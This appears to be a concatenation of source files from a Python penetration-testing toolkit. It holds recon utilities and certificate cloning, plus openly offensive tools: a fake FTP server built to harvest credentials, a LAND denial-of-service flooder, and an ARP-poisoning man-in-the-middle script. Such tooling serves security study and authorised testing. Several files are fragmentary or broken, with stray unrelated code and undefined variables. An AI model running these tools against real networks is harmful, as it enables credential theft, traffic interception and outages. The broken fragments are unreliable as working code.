    Example:

    \b
    $ habu.shodan 8.8.8.8
    {
        "hostnames": [
            "google-public-dns-a.google.com"
        ],
        "country_code": "US",
        "org": "Google",
        "data": [
            {
                "isp": "Google",
                "transport": "udp",
                "data": "Recursion: enabled",
                "asn": "AS15169",
                "port": 53,
                "hostnames": [
                    "google-public-dns-a.google.com"
                ]
            }
        ],
        "ports": [
            53
        ]
    }
    """

    habucfg = loadcfg()

    if 'SHODAN_APIKEY' not in habucfg:
        print('You must provide a shodan apikey. Use the ~/.habu.json file (variable SHODAN_APIKEY), or export the variable HABU_SHODAN_APIKEY')
        print('Get your API key from https://www.shodan.io/')
        sys.exit(1)

    if verbose:
        logging.basicConfig(level=logging.INFO, format='%(message)s')

    data = shodan_get_result(ip, habucfg['SHODAN_APIKEY'], no_cache, verbose)

    output.write(json.dumps(data, indent=4))
    output.write('\n')

if __name__ == '__main__':
    cmd_shodan()



#!/usr/bin/env python3

import re
import sys

import click


def detect_format(data):
    if data.startswith('<?xml version="1.0" encoding="UTF-8"?>'):
        return 'xml'

    lines = data.split('\n')

    if lines[1].startswith('Host'):
        return 'gnmap'

    if lines[1].startswith('Nmap scan report'):
        return 'nmap'

    return 'unknown'


def parse_format_xml(data, protocol):

    # <port protocol="tcp" portid="21"><state state="closed"

    line_regex_str = r'<port protocol="{}" portid="(?P<port>\d+)"><state state="open"'.format(protocol)
    line_regex = re.compile(line_regex_str)

    ports = []

    for line in data.split('\n'):
        m = line_regex.match(line)
        if m:
            ports.append(m.group(1))

    return ','.join(ports)



def parse_format_nmap(data, protocol):

    line_regex_str = r'(?P<port>\d+)/{}\s+open'.format(protocol)
    line_regex = re.compile(line_regex_str)

    ports = []

    for line in data.split('\n'):
        m = line_regex.match(line)
        if m:
            ports.append(m.group(1))

    return ','.join(ports)



def parse_format_gnmap(data, protocol):

    line_regex_str = r'(?P<port>\d+)/open/{}'.format(protocol)
    line_regex = re.compile(line_regex_str)

    ports = []

    for line in data.split('\n'):
        if 'Ports:' not in line:
            continue

        content = line.split('Ports: ')[1]
        for c in content.split(','):
            c = c.strip()
            m = line_regex.match(c)
            if m:
                ports.append(m.group(1))

    return ','.join(ports)



@click.command()
@click.argument('scanfile', type=click.File())
@click.option('-p', 'protocol', default='tcp', type=click.Choice(['tcp', 'udp', 'sctp']), help='The protocol (default=tcp)')
def cmd_nmap_open(scanfile, protocol):
    """Read an nmap report and print the open ports.

    Print the ports that has been resulted open reading the generated nmap output.

    You can use it to rapidly reutilize the port list for the input of other tools.

    Supports and detects the 3 output formats (nmap, gnmap and xml)

    Example:

    \b
    # habu.nmap.open portantier.nmap
    22,80,443
    """

    data = scanfile.read()
    fmt = detect_format(data)

    if fmt not in ['xml', 'nmap', 'gnmap']:
        print('Unknown file format.', file=sys.stdout)
        return 1

    if fmt == 'nmap':
        result = parse_format_nmap(data, protocol)
    elif fmt == 'gnmap':
        result = parse_format_gnmap(data, protocol)
    elif fmt == 'xml':
        result = parse_format_xml(data, protocol)

    print(result, end='')

    return True


if __name__ == '__main__':
    cmd_nmap_open()



#!/usr/bin/env python3

from cryptography import x509
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import ec, rsa
from cryptography.x509 import Extensions

from pprint import pprint


def certclone(chain, copy_extensions=False):

    for i in range(len(chain)):
        chain[i] = chain[i].to_cryptography()

    newchain = []

    '''
    key = rsa.generate_private_key(
        public_exponent=65537,
        key_size=2048,
        backend=default_backend()
        )

    pubkey = key.public_key()
    '''

    first = True

    for original in chain[::-1]:

        #print(cert)

        key = rsa.generate_private_key(
            public_exponent=65537,
            key_size=2048,
            backend=default_backend()
            )

        key_pem = key.private_bytes(
            encoding=serialization.Encoding.PEM,
            format=serialization.PrivateFormat.TraditionalOpenSSL,
            encryption_algorithm=serialization.NoEncryption()
        ).decode()

        if first:
            print(key_pem)
            first=False

        pubkey = key.public_key()

        # Todo: Code to mimic the private key type of original cert
        # maybe based on pubkey.__class__
        cert = x509.CertificateBuilder()
        cert = cert.subject_name(original.subject)
        cert = cert.issuer_name(original.issuer)
        #cert = cert.serial_number(original.serial_number)
        cert = cert.serial_number(x509.random_serial_number())
        cert = cert.not_valid_before(original.not_valid_before)
        cert = cert.not_valid_after(original.not_valid_after)
        cert = cert.public_key(pubkey)

        if copy_extensions:
            for ext in original.extensions:
                cert = cert.add_extension(ext.value, critical=ext.critical)

        cert = cert.sign(private_key=key, algorithm=original.signature_hash_algorithm, backend=default_backend())
        cert_pem = cert.public_bytes(serialization.Encoding.PEM).decode()
        print(cert_pem)

        newchain.insert(0, cert)

    #pprint(newchain)
    #return (key_pem, cert_pem)




#!/usr/bin/env python3

import click

from habu.lib.eicar import eicar


@click.command()
def cmd_eicar():
    """Print the EICAR test string that can be used to test antimalware engines.

    More info: http://www.eicar.org/86-0-Intended-use.html

    Example:

    \b
    $ habu.eicar
    X5O!P%@AP[4\XZP54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
    """

    print(eicar())

if __name__ == '__main__':
    cmd_eicar()



#!/usr/bin/env python3

from datetime import datetime, timedelta

from cryptography import x509
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import ec, rsa
from cryptography.x509 import Extensions


def certclone(cert_data, copy_extensions=False, expired=False):

    try:
        original = x509.load_pem_x509_certificate(cert_data, default_backend())
    except ValueError:
        pass

    try:
        original = x509.load_der_x509_certificate(cert_data, default_backend())
    except ValueError:
        raise ValueError("No recognized cert format. Allowed: PEM or DER")

    pubkey = original.public_key()

    # Todo: Code to mimic the private key type of original cert
    # maybe based on pubkey.__class__
    key = rsa.generate_private_key(
        public_exponent=65537,
        key_size=2048,
        backend=default_backend()
        )

    cert = x509.CertificateBuilder()
    cert = cert.subject_name(original.subject)
    cert = cert.issuer_name(original.issuer)
    cert = cert.serial_number(original.serial_number)
    cert = cert.not_valid_before(original.not_valid_before)

    if expired:
        cert = cert.not_valid_after(datetime.now() - timedelta(days=1))
    else:
        cert = cert.not_valid_after(original.not_valid_after)

    cert = cert.public_key(key.public_key())

    if copy_extensions:
        for ext in original.extensions:
            cert = cert.add_extension(ext.value, critical=ext.critical)

    cert = cert.sign(private_key=key, algorithm=original.signature_hash_algorithm, backend=default_backend())

    key_pem = key.private_bytes(
        encoding=serialization.Encoding.PEM,
        format=serialization.PrivateFormat.TraditionalOpenSSL,
        encryption_algorithm=serialization.NoEncryption()
    ).decode()

    cert_pem = cert.public_bytes(serialization.Encoding.PEM).decode()

    return (key_pem, cert_pem)




#!/usr/bin/env python3

import json
import logging
import sys

import click
import requests


def karma(ip):
    URL = 'https://karma.securetia.com/api/ip/'
    r = requests.get(URL + ip, headers={'Accept': 'application/json'})

    if r.status_code != 200:
        logging.error('HTTP Error code received: {}'.format(r.status_code))
        sys.exit(1)

    return r.json()


@click.command()
@click.argument('infile', type=click.File('r'), default='-')
@click.option('--json', 'jsonout', is_flag=True, default=False, help='JSON output')
@click.option('--bad', 'badonly', is_flag=True, default=False, help='Show only entries in blacklists')
@click.option('-v', 'verbose', is_flag=True, default=False, help='Verbose output')
def cmd_karma_bulk(infile, jsonout, badonly, verbose):
    """Show which IP addresses are inside blacklists using the Karma online service.

    Example:

    \b
    $ cat /var/log/auth.log | habu.extract.ipv4 | habu.karma.bulk
    172.217.162.4   spamhaus_drop,alienvault_spamming
    23.52.213.96    CLEAN
    190.210.43.70   alienvault_malicious
    """

    if verbose:
        logging.basicConfig(level=logging.INFO, format='%(message)s')

    data = infile.read()

    result = {}

    for ip in data.split('\n'):
        if ip:
            logging.info('Checking ' + ip)
            response = karma(ip)
            if response:
                result[ip] = response
            elif not badonly:
                result[ip] = ['CLEAN']

    if jsonout:
        print(json.dumps(result, indent=4))
    else:
        for k,v in result.items():
            print(k, '\t', ','.join(v))


if __name__ == '__main__':
    cmd_karma_bulk()



#!/usr/bin/env python3

import json
import logging

import click
import regex as re


def extract_ipv4(data):

    regexp = re.compile(r'((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)', flags=re.MULTILINE)

    match = regexp.finditer(data)

    result = []

    for m in match:
        result.append(m.group(0))

    return result

@click.command()
@click.argument('infile', type=click.File('r'), default='-')
@click.option('--json', 'jsonout', is_flag=True, default=False, help='JSON output')
@click.option('-v', 'verbose', is_flag=True, default=False, help='Verbose output')
def cmd_extract_ipv4(infile, jsonout, verbose):
    """Extract IPv4 addresses from a file or stdin.

    Example:

    \b
    $ cat /var/log/auth.log | habu.extract.ipv4
    172.217.162.4
    23.52.213.96
    190.210.43.70
    """

    if verbose:
        logging.basicConfig(level=logging.INFO, format='%(message)s')

    data = infile.read()

    result = []

    result = extract_ipv4(data)

    if jsonout:
        print(json.dumps(result, indent=4))
    else:
        print('\n'.join(result))


if __name__ == '__main__':
    cmd_extract_ipv4()



#!/usr/bin/env python3
import json

import click

from habu.lib.ip import get_external_ip


@click.command()
def cmd_ip():
    """Get the public IP address of the connection from https://api.ipify.org.

    Example:

    \b
    $ habu.ip
    {
        "ip_external": "80.219.53.185"
    }
    """
    answer = get_external_ip()

    print(json.dumps(answer, indent=4))

    return True


if __name__ == '__main__':
    cmd_ip()



#!/usr/bin/env python3

import logging

import click

logging.getLogger("scapy.runtime").setLevel(logging.ERROR)

from scapy.all import IP, conf, sr


@click.command()
@click.argument('ip')
@click.option('-i', 'iface', default=None, help='Interface to use')
@click.option('-t', 'timeout', default=2, help='Timeout for each probe (default: 2 seconds)')
@click.option('--all', 'all_protocols', is_flag=True, default=False, help='Probe all protocols (default: Defined in /etc/protocols)')
@click.option('-v', 'verbose', is_flag=True, default=False, help='Verbose output')
def cmd_protoscan(ip, iface, timeout, all_protocols, verbose):
    """
    Send IP packets with different protocol field content to guess what
    layer 4 protocols are available.

    The output shows which protocols doesn't generate a 'protocol-unreachable'
    ICMP response.

    Example:

    \b
    $ sudo python cmd_ipscan.py 45.77.113.133
    1   icmp
    2   igmp
    4   ipencap
    6   tcp
    17  udp
    41  ipv6
    47  gre
    50  esp
    51  ah
    58  ipv6_icmp
    97  etherip
    112 vrrp
    115 l2tp
    132 sctp
    137 mpls_in_ip
    """

    if verbose:
        logging.basicConfig(level=logging.INFO, format='%(message)s')

    conf.verb = False

    if iface:
        conf.iface = iface

    if all_protocols:
        protocols = (0,255)
    else:
        # convert "{name:num}" to {num:name}"
        protocols = { num:name for name,num in conf.protocols.__dict__.items() if isinstance(num, int) }

    ans,unans=sr(IP(dst=ip, proto=protocols.keys())/"SCAPY", retry=0, timeout=timeout, verbose=verbose)

    allowed_protocols = [ pkt['IP'].proto for pkt in unans ]

    for proto in sorted(allowed_protocols):
        print('{:<4} {}'.format(proto, protocols[proto])) #conf.protocols._find(str(proto))))


if __name__ == '__main__':
    cmd_protoscan()



#!/usr/bin/env python3

import json
import logging
import os
import os.path
import pwd
import webbrowser

import click
import requests
import requests_cache

from habu.lib.loadcfg import loadcfg

urls = {
    'aboutme': 'https://about.me/{}',
    'angelist': 'https://angel.co/{}',
    'asciinema': 'https://asciinema.org/~{}',
    'badoo': 'https://badoo.com/en/profile/{}',
    'bandcamp': 'https://bandcamp.com/{}',
    'basecamp': 'https://{}.basecamphq.com/login',
    'behance': 'https://www.behance.net/{}',
    'bitbucket': 'https://bitbucket.org/{}/',
    'bitly': 'https://bitly.com/u/{}',
    'blogger': 'http://{}.blogspot.com/',
    'cashme': 'https://cash.me/$hey{}/',
    'codeacademy': 'https://www.codecademy.com/{}',
    'codementor': 'https://www.codementor.io/{}',
    'dailymotion': 'https://www.dailymotion.com/{}',
    'devianart': 'https://{}.devianart.com/',
    'disqus': 'https://disqus.com/by/{}/',
    'dribble': 'https://dribbble.com/{}',
    'etsy': 'https://www.etsy.com/people/{}',
    'facebook': 'https://www.facebook.com/{}',
    'fanpop': 'http://www.fanpop.com/fans/{}',
    'fiverr': 'https://www.fiverr.com/{}',
    'fotolog': 'https://fotolog.com/{}/',
    'flickr': 'https://www.flickr.com/photos/{}/',
    'github': 'https://github.com/{}/',
    'goodread': 'https://www.goodreads.com/{}',
    'googleplus': 'https://plus.google.com/+{}/posts',
    'hubpages': 'https://hubpages.com/@{}',
    'imgur': 'https://imgur.com/user/{}',
    'ifttt': 'https://ifttt.com/p/{}',
    'instagram': 'https://instagram.com/{}/',
    'instructables': 'https://www.instructables.com/member/{}/',
    'keybase': 'https://keybase.io/{}',
    'kongregate': 'http://www.kongregate.com/accounts/{}',
    'lastfm': 'https://www.last.fm/user/{}',
    'livejournal': 'https://{}.livejournal.com/',
    'medium': 'https://medium.com/@{}',
    'mercadolibre': 'https://perfil.mercadolibre.com.ar/{}',
    'openhub': 'https://www.openhub.net/accounts/{}',
    'pastebin': 'https://pastebin.com/u/{}',
    'pinterest': 'https://in.pinterest.com/{}/',
    'producthunt': 'https://www.producthunt.com/@{}',
    'quora': 'https://{}.quora.com/',
    'reddit': 'https://www.reddit.com/user/{}/',
    'slack': 'https://{}.slack.com/',
    'slideshare': 'https://www.slideshare.net/{}',
    'soundcloud': 'https://soundcloud.com/{}',
    'soup': 'http://{}.soup.io/',
    'tripadvisor': 'https://www.tripadvisor.com/members/{}',
    'tumblr': 'https://{}.tumblr.com',
    'twitter': 'https://twitter.com/{}',
    'vimeo': 'https://vimeo.com/{}',
    'vk': 'http://vk.com/{}',
    'wikipedia': 'https://en.wikipedia.org/wiki/User:{}',
    'wordpress': 'https://{}.wordpress.com/',
    'youtube':'https://www.youtube.com/{}',
}


@click.command()
@click.argument('username')
@click.option('-c', 'no_cache', is_flag=True, default=False, help='Disable cache')
@click.option('-v', 'verbose', is_flag=True, default=False, help='Verbose output')
@click.option('-w', 'wopen', is_flag=True, default=False, help='Open each valid url in a webbrowser')
def cmd_usercheck(username, no_cache, verbose, wopen):
    """Check if the given username exists on various social networks and other popular sites.

    \b
    $ habu.usercheck portantier
    {
        "aboutme": "https://about.me/portantier",
        "disqus": "https://disqus.com/by/portantier/",
        "github": "https://github.com/portantier/",
        "ifttt": "https://ifttt.com/p/portantier",
        "lastfm": "https://www.last.fm/user/portantier",
        "medium": "https://medium.com/@portantier",
        "pastebin": "https://pastebin.com/u/portantier",
        "pinterest": "https://in.pinterest.com/portantier/",
        "twitter": "https://twitter.com/portantier",
        "vimeo": "https://vimeo.com/portantier"
    }
    """

    habucfg = loadcfg()

    if verbose:
        logging.basicConfig(level=logging.INFO, format='%(message)s')

    if not no_cache:
        homedir = pwd.getpwuid(os.getuid()).pw_dir
        requests_cache.install_cache(homedir + '/.habu_requests_cache')
        logging.info('using cache on ' + homedir + '/.habu_requests_cache')

    existent = {}

    for site, url in urls.items():
        u = url.format(username)
        logging.info(u)
        try:
            r = requests.head(u, allow_redirects=False)
        except Exception:
            continue
        if r.status_code == 200:
            if requests.head(url.format('zei4fee3q9'), allow_redirects=False).status_code == 200:
                logging.error('Received status 200 for user zei4fee3q9, maybe, the check needs to be fixed')
            else:
                existent[site] = u
                if wopen:
                    webbrowser.open_new_tab(u)

    print(json.dumps(existent, indent=4))

if __name__ == '__main__':
    cmd_usercheck()



#!/usr/bin/env python3

import asyncio
import click
import os
import pwd
import ssl


def drop_privileges():

    if os.getuid() != 0:
        return

    if 'SUDO_UID' not in os.environ:
        return

    pwnam = pwd.getpwuid(int(os.environ['SUDO_UID']))

    print('Dropping privileges and going to user', pwnam.pw_name)

    # Remove group privileges
    os.setgroups([])

    # Try setting the new uid/gid
    os.setgid(pwnam.pw_gid)
    os.setuid(pwnam.pw_uid)

    # Ensure a reasonable umask
    old_umask = os.umask(0o22)

    return True


class ServerFTP(asyncio.Protocol):


    def connection_made(self, transport):
        self.transport = transport
        self.username = None
        self.password = None
        self.valid_cmds = ['USER', 'PASS']
        self.address = transport.get_extra_info('peername')
        self.transport.write(b'220 ProFTPD 1.3.5a Server (ProFTPD Server)\n')
        print('Accepted connection from {}'.format(self.address))


    def data_received(self, data):
        #self.transport.write(data)

        cmd = data.decode().split(' ')[0].strip().upper()

        if cmd not in self.valid_cmds:
            self.transport.write('500 {} not understood\n'.format(cmd).encode())
            return True

        if cmd == 'USER':
            username = data.decode().split(' ')[1].strip()
            if username:
                self.username = username
                self.transport.write('331 Password required for {}\n'.format(username).encode())
            else:
                self.transport.write('500 USER: command requires a parameter\n'.encode())

            return True

        if cmd == 'PASS':
            password = data.decode().split(' ')[1].strip()
            if not self.username:
                self.transport.write(b'530 Please login first\n')
                return True

            if not password:
                self.transport.write(b'530 Login incorrect.\n')
                return True

            self.password = password
            self.transport.write(b'530 Login incorrect.\n')

            if self.username.lower() == 'anonymous':
                print('Anonymous login.')
            else:
                print('Credentials collected from {}! {} {}'.format(self.address[0], self.username, self.password))

            return True


    def connection_lost(self, exc):
        if exc:
            print('Client {} error: {}'.format(self.address, exc))
        else:
            print('Client {} closed socket'.format(self.address))


@click.command()
@click.option('-a', 'address', default=None, help='Address to bind (default: all)')
@click.option('-p', 'port', default=21, help='Which port to use (default: 21)')
@click.option('--ssl', 'enable_ssl', is_flag=True, default=False, help='Enable SSL/TLS (default: False)')
@click.option('--ssl-cert', 'ssl_cert', default=None, help='SSL/TLS Cert file')
@click.option('--ssl-key', 'ssl_key', default=None, help='SSL/TLS Key file')
@click.option('-v', 'verbose', is_flag=True, default=False, help='Verbose')
def cmd_server_ftp(address, port, enable_ssl, ssl_cert, ssl_key, verbose):
    """Basic fake FTP server, whith the only purpose to steal user credentials.

    Supports SSL/TLS.

    Example:

    \b
    # sudo habu.server.ftp --ssl --ssl-cert /tmp/cert.pem --ssl-key /tmp/key.pem
    Listening on port 21
    Accepted connection from ('192.168.0.27', 56832)
    Credentials collected from 192.168.0.27! fabian 123456
    """

    ssl_context = None

    if enable_ssl:

        if not (ssl_cert and ssl_key):
            print('Please, specify --ssl-cert and --ssl-key to enable SSL/TLS')
            return False

        ssl_context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
        ssl_context.check_hostname = False
        ssl_context.load_cert_chain(ssl_cert, ssl_key)

    loop = asyncio.get_event_loop()
    coro = loop.create_server(ServerFTP, host=address, port=port, ssl=ssl_context, reuse_address=True, reuse_port=True)
    server = loop.run_until_complete(coro)
    drop_privileges()

    print('Listening on port {}'.format(port))

    try:
        loop.run_forever()
    finally:
        server.close()

    loop.close()

if __name__ == '__main__':
    cmd_server_ftp()




#!/usr/bin/env python3

import sys
from time import sleep
import logging
import click

logging.getLogger("scapy.runtime").setLevel(logging.ERROR)

from scapy.all import IP, TCP, conf, send


@click.command()
@click.argument('ip')
@click.option('-c', 'count', default=0, help='How many packets send (default: infinit)')
@click.option('-p', 'port', default=135, help='Port to use (default: 135)')
@click.option('-i', 'iface', default=None, help='Interface to use')
@click.option('-v', 'verbose', is_flag=True, default=False, help='Verbose')
def cmd_land(ip, count, port, iface, verbose):
    """This command implements the LAND attack, that sends packets forging the
    source IP address to be the same that the destination IP. Also uses the
    same source and destination port.

    The attack is very old, and can be used to make a Denial of Service on
    old systems, like Windows NT 4.0. More information here:
    https://en.wikipedia.org/wiki/LAND

    \b
    # sudo habu.land 172.16.0.10
    ............

    Note: Each dot (.) is a sent packet. You can specify how many
    packets send with the '-c' option. The default is never stop. Also, you
    can specify the destination port, with the '-p' option.
    """

    conf.verb = False

    if iface:
        conf.iface = iface

    layer3 = IP()
    layer3.dst = ip
    layer3.src = ip

    layer4 = TCP()
    layer4.dport = port
    layer4.sport = port

    pkt = layer3 / layer4

    counter = 0

    while True:
        send(pkt)
        counter += 1

        if verbose:
            print(pkt.summary())
        else:
            print('.', end='')
            sys.stdout.flush()

        if count != 0 and counter == count:
            break

    return True

if __name__ == '__main__':
    cmd_land()



"""Perform a forward lookup of a hostname."""
import json
import logging
import sys

import click

from habu.lib.dns import lookup_forward


@click.command()
@click.argument('hostname')
@click.option('-v', 'verbose', is_flag=True, default=False, help='Verbose output')
def cmd_dns_lookup_forward(hostname, verbose):
    """Perform a forward lookup of a given hostname.

    Example:

    \b
    $ habu.dns.lookup.forward google.com
    {
        "ipv4": "172.217.168.46",
        "ipv6": "2a00:1450:400a:802::200e"
    }
    """
    if verbose:
        logging.basicConfig(level=logging.INFO, format='%(message)s')
        print("Looking up %s..." % hostname, file=sys.stderr)

    answer = lookup_forward(hostname)

    print(json.dumps(answer, indent=4))

    return True


if __name__ == '__main__':
    cmd_dns_lookup_forward()



#!/usr/bin/env python3

import logging
import time

import click

logging.getLogger("scapy.runtime").setLevel(logging.ERROR)

from scapy.all import ARP, Ether, conf, getmacbyip, sendp


@click.command()
@click.argument('victim1')
@click.argument('victim2')
@click.option('-i', 'iface', default=None, help='Interface to use')
@click.option('-v', 'verbose', is_flag=True, default=False, help='Verbose')
def cmd_arp_poison(victim1, victim2, iface, verbose):
    """Send ARP 'is-at' packets to each victim, poisoning their
    ARP tables for send the traffic to your system.

    Note: If you want a full working Man In The Middle attack, you need
    to enable the packet forwarding on your operating system to act like a
    router. You can do that using:

    # echo 1 > /proc/sys/net/ipv4/ip_forward

    Example:

    \b
    # habu.arpoison 192.168.0.1 192.168.0.77
    Ether / ARP is at f4:96:34:e5:ae:1b says 192.168.0.77
    Ether / ARP is at f4:96:34:e5:ae:1b says 192.168.0.70
    Ether / ARP is at f4:96:34:e5:ae:1b says 192.168.0.77
    ...
    """

    conf.verb = False

    if iface:
        conf.iface = iface

    mac1 = getmacbyip(victim1)
    mac2 = getmacbyip(victim2)

    pkt1 = Ether(dst=mac1)/ARP(op="is-at", psrc=victim2, pdst=victim1, hwdst=mac1)
    pkt2 = Ether(dst=mac2)/ARP(op="is-at", psrc=victim1, pdst=victim2, hwdst=mac2)

    try:
        while 1:
            sendp(pkt1)
            sendp(pkt2)

            if verbose:
                pkt1.show2()
                pkt2.show2()
            else:
                print(pkt1.summary())
                print(pkt2.summary())

            time.sleep(1)

    except KeyboardInterrupt:
        pass

if __name__ == '__main__':
    cmd_arp_poison()



#!/usr/bin/env python3

import os
import select
import socket
import ssl
import sys

from time import sleep

import click
from scapy.all import IP, IPv6


def which_source_for(ip):
    try:
        return IP(dst=ip).src
    except Exception:
        pass
    return IPv6(dst=ip).src




    HOST, PORT = "localhost", 0

    server = ThreadedTCPServer((HOST, PORT), ThreadedTCPRequestHandler)
    with server:
        ip, port = server.server_address

        # Start a thread with the server -- that thread will then start one
        # more thread for each request
        server_thread = threading.Thread(target=server.serve_forever)
        # Exit the server thread when the main thread terminates
        server_thread.daemon = True
        server_thread.start()
        print("Server loop running in thread:", server_thread.name)

        client(ip, port, "Hello World 1")
        client(ip, port, "Hello World 2")
        client(ip, port, "Hello World 3")

        server.shutdown()






@click.command()
@click.argument('host')
@click.argument('port', type=click.IntRange(1, 65535))
@click.option('--family', 'family', type=click.Choice(['4', '6', '46']), default='46', help='IP Address Family')
@click.option('--ssl', 'ssl_enable', is_flag=True, default=False, help='Enable SSL')
@click.option('--crlf', 'crlf', is_flag=True, default=False, help='Use CRLF for EOL sequence')
@click.option('--protocol', type=click.Choice(['tcp', 'udp']), default='tcp', help='Layer 4 protocol to use')
@click.option('--source-ip', type=click.STRING, default=None, help='Source IP to use')
@click.option('--source-port', type=click.IntRange(0, 65535), default=0, help='Source port to use')
def cmd_nc(host, port, family, ssl_enable, crlf, source_ip, source_port, protocol):
    """Some kind of netcat/ncat replacement.

    The execution emulates the feeling of this popular tools.

    Example:

    \b
    $ habu.nc --crlf www.portantier.com 80
    Connected to 45.77.113.133 80
    HEAD / HTTP/1.0

    \b
    HTTP/1.0 301 Moved Permanently
    Date: Thu, 26 Jul 2018 21:10:51 GMT
    Server: OpenBSD httpd
    Connection: close
    Content-Type: text/html
    Content-Length: 443
    Location: https://www.portantier.com/
    """




    resolved = socket.getaddrinfo(host, port)

    families = {
        '4' :  [ socket.AF_INET ],
        '6' :  [ socket.AF_INET6 ],
        '46':  [ socket.AF_INET, socket.AF_INET6]
    }

    address = None
    for r in resolved:
        if r[0] in families[family]:
            address = r # (<AddressFamily.AF_INET6: 10>, <SocketType.SOCK_STREAM: 1>, 6, '', ('2606:2800:220:1:248:1893:25c8:1946', 80, 0, 0))

    if not address:
        print('Could not resolve {} to the ip address family selected ({})'.format(host, family), file=sys.stderr)
        sys.exit(1)

    to_send = b''
    queue_remote = b''
    queue_local = b''

    if not source_ip:
        source_ip = which_source_for(address[4][0])

    if protocol == 'tcp':
        rsocket = socket.socket(address[0], socket.SOCK_STREAM)
        lsocket = socket.socket(address[0], socket.SOCK_STREAM)
    else:
        rsocket = socket.socket(address[0], socket.SOCK_DGRAM)
        lsocket = socket.socket(address[0], socket.SOCK_DGRAM)

    rsocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    rsocket.bind((source_ip, source_port))

    lsocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    lsocket.bind(('127.0.0.1', 8080))

    if ssl_enable:
        ssl_context = ssl.SSLContext()
        rsocket = ssl_context.wrap_socket(s, server_side=False)


    lsocket.listen()

    lconnection, laddress = lsocket.accept()


    ########## CONNECT RSOCKET ###############################
    try:
        rsocket.connect((address[4][0], port))

        print('Connected to', address[4][0], port, file=sys.stderr)
    except Exception as e:
        print(e, file=sys.stderr)
        sys.exit(1)


    print(laddress, '==>', '127.0.0.1:8080', '==>', address[4][0], port)

    while True:

        iready, oready, eready = select.select([rsocket, lconnection], [], [rsocket], 1)

        for i in iready:
            if i == rsocket:
                queue_local += i.recv(4096)
            else:
                queue_remote += i.recv(4096)

        iready, oready, eready = select.select([], [rsocket, lconnection], [rsocket], 1)


        for o in oready:
            if o == rsocket:
                o.send(queue_remote)
                print(queue_remote)
                queue_remote = b''
            else:
                o.send(queue_local)
                print(queue_local)
                queue_local = b''
        sleep(1)
    s.close()


if __name__ == '__main__':
    cmd_nc()



#!/usr/bin/env python3

import logging
from time import sleep

import click


@click.command()
@click.argument('ip')
@click.option('-v', 'verbose', is_flag=True, default=False, help='Verbose output')
def cmd_bruteforce(ip, protocol, userfile, passfile):
    """
    Brute force compatible with various protocols

    Example:

    \b
    # habu.bruteforce -m ftp -u users.txt -p passwords.txt 192.168.0.100
    """

    if verbose:
        logging.basicConfig(level=logging.INFO, format='%(message)s')


if __name__ == '__main__':
    cmd_bruteforce()





from netifaces import (
    AF_INET, AF_INET6, AF_LINK, gateways, ifaddresses, interfaces)

import requests
import ipaddress

def get_external_ip():
    """Get the external IP address for the connection."""
    ip_address = requests.get('https://api.ipify.org', timeout=5).text
    return {'ip_external': ip_address}


def get_internal_ip():
    """Get the local IP addresses."""
    nics = {}
    for interface_name in interfaces():
        addresses = ifaddresses(interface_name)
        try:
            nics[interface_name] = {
                'ipv4': addresses[AF_INET],
                'link_layer': addresses[AF_LINK],
                'ipv6': addresses[AF_INET6],
            }
        except KeyError:
            pass

    return nics


def geo_location(ip_address):
    """Get the Geolocation of an IP address."""
    try:
        type(ipaddress.ip_address(ip_address))
    except ValueError:
        return {}

    data = requests.get(
        'https://ipapi.co/{}/json/'.format(ip_address), timeout=5).json()
    return data


def get_gateways():
    """Get all gateways for the interfaces."""
    return gateways()


if __name__ == '__main__':
    print(get_external_ip())



import BaseHTTPServer, SimpleHTTPServer
import ssl

httpd = BaseHTTPServer.HTTPServer(('localhost', 4443), SimpleHTTPServer.SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap_socket (httpd.socket, certfile='/tmp/chain.pem', keyfile='/tmp/chain.key', server_side=True)
httpd.serve_forever()




#!/usr/bin/env python3
import json
import logging
import sys

import click

from habu.lib.host import gather_details


@click.command()
@click.option('-v', 'verbose', is_flag=True, default=False, help='Verbose output.')
def cmd_host(verbose):
    """
    Collect information about the host where habu is running.

    Example:

    \b
    $ habu.host
    {
        "kernel": [
            "Linux",
            "demo123",
            "5.0.6-200.fc29.x86_64",
            "#1 SMP Wed Apr 3 15:09:51 UTC 2019",
            "x86_64",
            "x86_64"
        ],
        "distribution": [
            "Fedora",
            "29",
            "Twenty Nine"
        ],
        "libc": [
            "glibc",
            "2.2.5"
        ],
        "arch": "x86_64",
        "python_version": "3.7.3",
        "os_name": "Linux",
        "cpu": "x86_64",
        "static_hostname": "demo123",
        "fqdn": "demo123.lab.sierra"
    }
    """
    if verbose:
        logging.basicConfig(level=logging.INFO, format='%(message)s')
        print("Gather information about the host...", file=sys.stderr)

    result = gather_details()

    if result:
        print(json.dumps(result, indent=4))
    else:
        print("[X] Unable to gather information")

    return True


if __name__ == '__main__':
    cmd_host()



import ipaddress
import json
import logging
import os
import pwd
import re
import sys
import time
from pathlib import Path

import click
from dnslib import QTYPE, RR, A
from dnslib.server import BaseResolver, DNSServer

logging.getLogger("scapy.runtime").setLevel(logging.ERROR)

from scapy.all import ICMP, IP, conf, sr1

#logging.getLogger("scapy.runtime").setLevel(logging.ERROR)

#from time import sleep


class MyResolver(BaseResolver):

    def __init__(self, addr4, addr6):
        self.address = address
        pass
        #user = pwd.getpwnam(sys.argv[1])

        #self.homedir = Path(user.pw_dir)
        #self.dotdir = self.homedir / '.asydns'
        #self.datadir = self.dotdir / 'data'

        #self.datadir.mkdir(parents=True, exist_ok=True)

        #self.regex_sha224 = re.compile('[0-9a-f]{56}')

        #self.cfg_file = self.dotdir / 'config.json'

        #defaults = {
        #    'domain': 'a.asydns.org',
        #    'ttl' : 3600,
        #    'registers': {}
        #}

        #self.cfg = defaults

        #if self.cfg_file.is_file():
        #    try:
        #        with self.cfg_file.open() as c:
        #            self.cfg.update(json.loads(c.read()))
        #    except Exception:
        #        print('error loading config file, using defaults', file=sys.stderr)


    def resolve(self, request, handler):
        reply = request.reply()
        qname = request.q.qname
        qn = str(qname)

        print(request.q)
